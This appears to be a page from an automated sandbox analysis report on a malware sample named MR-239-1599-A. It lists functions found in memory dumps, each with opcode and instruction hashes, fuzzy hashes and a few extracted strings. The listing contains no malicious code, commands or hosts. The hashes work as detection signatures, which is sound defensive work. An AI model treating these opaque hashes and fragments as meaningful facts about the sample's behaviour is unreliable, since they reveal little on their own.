                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 9f592e37cc485d524b9ab2595fd9c65912433c353dca32cec683e0f43f2f1dc8
                                                                                                                                                                                                          • Instruction ID: bce9bc31ebc8c0fa65c92c008ed0be81c6061ec8e2289179cb6e961298162a4c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f592e37cc485d524b9ab2595fd9c65912433c353dca32cec683e0f43f2f1dc8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7FD05BB091930DDECB54BFB8640F6797ABCD71B215F102559D809C7511EE304591C7C1
                                                                                                                                                                                                          Function 07863F20 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 41c33d77a2e3c8ea41f464299a811cd9dd040b8b8d218b479ba3395382b67adc
                                                                                                                                                                                                          • Instruction ID: b13f2d27f1e71eb722e67355fb369cc40001449b2dfc036dd3cfe2090407cf39
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41c33d77a2e3c8ea41f464299a811cd9dd040b8b8d218b479ba3395382b67adc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDD0A7F013928FEADF506EB5780D27639BC476B616F003420F40EC1853EE20C0908290
                                                                                                                                                                                                          Function 07869B00 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0133646b72c68dcd62740f219c525720f2ace413cba866c07b8edfdb2ca7c46b
                                                                                                                                                                                                          • Instruction ID: edcca8e4a2320a3bb8f00692c4eb46f9271eb7cc52beec9dc9435e6d7ceaf658
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0133646b72c68dcd62740f219c525720f2ace413cba866c07b8edfdb2ca7c46b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FE08670E0520DDBCB08EFA8E9465ADBB75EB81701F5040ADD409273A0DF301E41CB91
                                                                                                                                                                                                          Function 0786F2ED Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b2bf684d0410c23b604214b8d8e9166a6f428c910505f35f68c5f0d7732fd31d
                                                                                                                                                                                                          • Instruction ID: b6ab367b3045fabbb01a4128f6a6007798f9ff86054de70cd9ab9f8775575f82
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b2bf684d0410c23b604214b8d8e9166a6f428c910505f35f68c5f0d7732fd31d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1E06DB8A25249CFC704DF68E1498AA7BB5FF0A304B006024E50A8B316DB309840CF80
                                                                                                                                                                                                          Function 0786DA1F Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0efe8d7265d0350627b5f38e20e4bb54daddfe9488360060f2cef1d577ef07ec
                                                                                                                                                                                                          • Instruction ID: c97cd685441bbba820a5a4a23f38989df83c0d0b43fbd10e78d007ff0ed2d7b9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0efe8d7265d0350627b5f38e20e4bb54daddfe9488360060f2cef1d577ef07ec
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BF0EC71A5C3C5DED710DF79C548A4D7FF0BF05225F18CA99D060D77A1D63981018B40
                                                                                                                                                                                                          Function 07767D38 Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 1ff7a0e53c629242f070e768b59982a45d881d318ac2998016cc9178de9ebbd3
                                                                                                                                                                                                          • Instruction ID: 7ff01b9e2e84ce52d8dfda4d1b323b0a324396152ccad05c67ac07b2b1d3230b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1ff7a0e53c629242f070e768b59982a45d881d318ac2998016cc9178de9ebbd3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14E0C2B4A08208DBCB08DFA4E5456BCBBB8EB45308F6094ECDC0913354CB316E52DBC0
                                                                                                                                                                                                          Function 0786F55E Relevance: .0, Instructions: 19COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0e96d1269cb960fc95dc9edbc3d16ac73808ac88721be64a3e6a845d110b80ef
                                                                                                                                                                                                          • Instruction ID: 4754e502278ce2e3892e184b72c5f07dc08f81f8db5be73823b0008e44775b4b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e96d1269cb960fc95dc9edbc3d16ac73808ac88721be64a3e6a845d110b80ef
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F7E039B4919284CFCB00DFE4D40465DBB75AF45300F10961A9822AF39ED73159068B81
                                                                                                                                                                                                          Function 07860E28 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5bfeea7f40a155f71ceba6de8ebedbd5ac0e59893042d36512c2c756fa3df32e
                                                                                                                                                                                                          • Instruction ID: 33b26882855056bc07f739abb2bf7d7a78f986a4aebcaad92421b9f47906d15a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5bfeea7f40a155f71ceba6de8ebedbd5ac0e59893042d36512c2c756fa3df32e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DD05E317046145BC709664CA120B9AB6DA9FC9751F14806AE6098B380C9B19C0146DA
                                                                                                                                                                                                          Function 0786DA30 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b4ed87be2595905d4379bdca6413bbe0c8d1f875a8202ef03645e71d3c43df6f
                                                                                                                                                                                                          • Instruction ID: f430342b6785b243e8b647531cf44928b43cd1f0c182f97225a9fd73068e9911
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4ed87be2595905d4379bdca6413bbe0c8d1f875a8202ef03645e71d3c43df6f
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25E04FB0E04209EFCB40DF79C548A5EBBF0BF08200F1084A5C014E7311E77486008F90
                                                                                                                                                                                                          Function 07862EC8 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 86e2fc1910ff4e44b5e18197cf29e1ce0131290f57c26db804447d11c2ea12f1
                                                                                                                                                                                                          • Instruction ID: a63d2d497cc06465570e7c5d16c0215de276112c7d49075c782ae79f322a07d0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86e2fc1910ff4e44b5e18197cf29e1ce0131290f57c26db804447d11c2ea12f1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0CD0A736254148AFDB419FD5A800FA23B68BB19340F54B041F6540E222C132A463EB65
                                                                                                                                                                                                          Function 0786C297 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b3eea6125bf9cb64840fb3db80ee3cf5da124d57a0d5cded937d3d30273a7d75
                                                                                                                                                                                                          • Instruction ID: 22c6b3682a3757595367d06b2ef2f63a80970434f3aa42042f6deebb8645f4aa
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3eea6125bf9cb64840fb3db80ee3cf5da124d57a0d5cded937d3d30273a7d75
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69D0A7700047059AC358DBC8D18E362BBEE6B1621DF04A41A9C4E829A08A747044DB65
                                                                                                                                                                                                          Function 0786CB85 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: bc11c770ed9eb67e31bdf50d6fa853e56e07de1c836114334ccc8c963c690c72
                                                                                                                                                                                                          • Instruction ID: 76d6b86a53d4d964836cd83876bb42ca56951b462ffa5ee563a32ef4ce4f2b07
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc11c770ed9eb67e31bdf50d6fa853e56e07de1c836114334ccc8c963c690c72
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25D09271204214CFC719AF20C149A647B7AEB4E216F0164A9D40E9B212CB3AEC81CF10
                                                                                                                                                                                                          Function 07862070 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 94d58918d845689c1dafc0f8950c766166cd0616a8667bfc04342a2bf648407d
                                                                                                                                                                                                          • Instruction ID: e08ed02048b94f1ffe9afe15a5860b78e116e1bae5cf150fb180ec6336f29068
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94d58918d845689c1dafc0f8950c766166cd0616a8667bfc04342a2bf648407d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7AC02B3175013C134B0C3169340406D328EDEC7620304002BE909C3300CC505C0002D8
                                                                                                                                                                                                          Function 07862ED8 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ca5ef9ccd4ae8ded6131032209a70e4cd34ff4d38fc032cc6dafa3f7b736a6c1
                                                                                                                                                                                                          • Instruction ID: 961b79e7205f20d1fd00330a24aad78585a807f94269e5efa76ee9c228486c78
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca5ef9ccd4ae8ded6131032209a70e4cd34ff4d38fc032cc6dafa3f7b736a6c1
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7C01236261208AFDA81AA98C800D56776DAB08610F909000BA080A201C272E8629BA4
                                                                                                                                                                                                          Function 0786C2A8 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: ec41fcd70c24717ff77b29f1a079cfc4616c0405be25991856ff7e4448fb5cdf
                                                                                                                                                                                                          • Instruction ID: 2df5efa0cfad23593422cebb660f5b0e64c9a1819cb86a52b55cd584b45d98e4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec41fcd70c24717ff77b29f1a079cfc4616c0405be25991856ff7e4448fb5cdf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74C02BB000930987C38437C4B00D3713BAF431761DF443005EC0EC21604EA42090F2B1
                                                                                                                                                                                                          Function 0776E218 Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0cfd76d03ff487fd41a37ae1334eb0890aafd6641ddebd16eab7b8eefd89fe87
                                                                                                                                                                                                          • Instruction ID: c104ea98325ea238e555d3953a849292fa72931630b201056c6b6108edc7acd1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cfd76d03ff487fd41a37ae1334eb0890aafd6641ddebd16eab7b8eefd89fe87
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3BC08C700006048FC30027D8F40E32A3669B705202F443110AC0B00016CFA81420CAA5
                                                                                                                                                                                                          Function 0786F16E Relevance: .0, Instructions: 10COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 0a5c3b7749708dd3399ecc220978d0cc1a90b7f641cccca305b982435ea26ece
                                                                                                                                                                                                          • Instruction ID: e8d56a96614609024c3f7a098318d284d97ef51eb98e273bf858da750f74843d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a5c3b7749708dd3399ecc220978d0cc1a90b7f641cccca305b982435ea26ece
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42D0C9B8921108DFCB04AFA8E148A9EBBB1EF80304F009925D412B7258D77444868F91
                                                                                                                                                                                                          Function 07861C84 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: b4d9a9a6d7cc3975c46cf1f43e2b5a28389c547fab3d53bab17a6abc39c62295
                                                                                                                                                                                                          • Instruction ID: 6ce8ea620aa6be5aec734b5ea6a8a24166dd78d8e6903b1d0a3304d0bbc13d98
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4d9a9a6d7cc3975c46cf1f43e2b5a28389c547fab3d53bab17a6abc39c62295
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25B01276E0000CD5CF00CBC4F0083FCB730E78023AF000463C208A2000C33003694692
                                                                                                                                                                                                          Function 0786D421 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 1d6a7e8d922c8908f0a0289e5e0f6960fffcbe5a8f4ce0453eed14ee0678082a
                                                                                                                                                                                                          • Instruction ID: 459b5eab0742399e974a219ad6ca2f26c5e25eb990d7a409624f0b867a18c714
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d6a7e8d922c8908f0a0289e5e0f6960fffcbe5a8f4ce0453eed14ee0678082a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75C04C74904299CFDB109F90D849B9E7B32BB55355F109085D80B73254C73569D4CFB1
                                                                                                                                                                                                          Function 0786D045 Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c207788ef2f4c29f19bb686a72dfbe4f9702beaca4232cba58e41e9996a8ca6c
                                                                                                                                                                                                          • Instruction ID: 4fd1b4726df90c048dd8992bde3a3fa731f18b7dab23e9044aaaf67a378394fe
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c207788ef2f4c29f19bb686a72dfbe4f9702beaca4232cba58e41e9996a8ca6c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AC08C3000D4009BCF402F28C80E1117338FB1632130412A2883E880EAC32284008FB1

                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                          Function 07766A00 Relevance: 7.3, Strings: 5, Instructions: 1015COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1654976075.0000000007760000.00000040.00000800.00020000.00000000.sdmp, Offset: 07760000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7760000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: TJcq$Te^q$nfigsCollectedInHeartbeatTime$pbq$xbaq
                                                                                                                                                                                                          • API String ID: 0-2911530222
                                                                                                                                                                                                          • Opcode ID: 4a0fa367c3ca0849ee9b45f4387e07f66b94a9ba24af5b07169937e3f2239fba
                                                                                                                                                                                                          • Instruction ID: 1c6f555811fc30d01d21a0d9c9108b71d15b587f4434572211c08375d703f92a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4a0fa367c3ca0849ee9b45f4387e07f66b94a9ba24af5b07169937e3f2239fba
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45B2C375E00628DFDB64CF69C984AD9BBB2BF89304F1581E9D509AB325DB319E81CF40
                                                                                                                                                                                                          Function 0786C6D2 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'^q
                                                                                                                                                                                                          • API String ID: 0-1614139903
                                                                                                                                                                                                          • Opcode ID: 8a5cbcdc4e3d9c55444b5f01ed590e14c1efc8dc8ee4e0266b9548aae9691414
                                                                                                                                                                                                          • Instruction ID: 58a47ca7eecb38d5c37674fb1350b4bac9ca50969676a4959b25a6b6d0e1612b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a5cbcdc4e3d9c55444b5f01ed590e14c1efc8dc8ee4e0266b9548aae9691414
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F718EB5A002098FD749EF7AE88479EBBF3FB88300F14D52AC4159B369EB3454468B90
                                                                                                                                                                                                          Function 0786C6E0 Relevance: 1.4, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID: 4'^q
                                                                                                                                                                                                          • API String ID: 0-1614139903
                                                                                                                                                                                                          • Opcode ID: 3cfd206aeab3212c48a0b0e3a917e80fecf18654746ec9f3eb3f91f53f9f49fa
                                                                                                                                                                                                          • Instruction ID: 8fab52b2beecdf59f8f6c20ece8e4a6b759141310c7787ddbddd38b58378c9cb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3cfd206aeab3212c48a0b0e3a917e80fecf18654746ec9f3eb3f91f53f9f49fa
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF612C75A012098FDB49EF7AE89569EBBF3FB88300F14D529C4159B368EB7458458B80
                                                                                                                                                                                                          Function 02B0F3F8 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1651748821.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2b00000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: e9f6d5215d6e00a4343f371f0e3076d0195059f58b1d3fffe3dc7e4199d36b4c
                                                                                                                                                                                                          • Instruction ID: 78c548d182ae7abc5265105fc94590e85284b2b391e378debf08800b9f2daeee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9f6d5215d6e00a4343f371f0e3076d0195059f58b1d3fffe3dc7e4199d36b4c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4412A7F0D81B458AD310EF25EA5E3897BB1B7C6398BD04B09D2612F2E5D7B4116ACF44
                                                                                                                                                                                                          Function 0786F760 Relevance: .3, Instructions: 312COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.1655096258.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7860000_MR-239-1599-A.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 94c0efd0dcc5c40870dad9abe8d674bcc72aecfbcf4f93c12b05c713ace3e277
                                                                                                                                                                                                          • Instruction ID: a7e5af46af8c5ef9e22d3833ed96b65aa7b26a57420f21a757ec75c44aa59854
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94c0efd0dcc5c40870dad9abe8d674bcc72aecfbcf4f93c12b05c713ace3e277
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AE1FAB4E001199FCB14DFA9D584AAEFBB2FF89305F24C169E514AB356DB30A941CF60
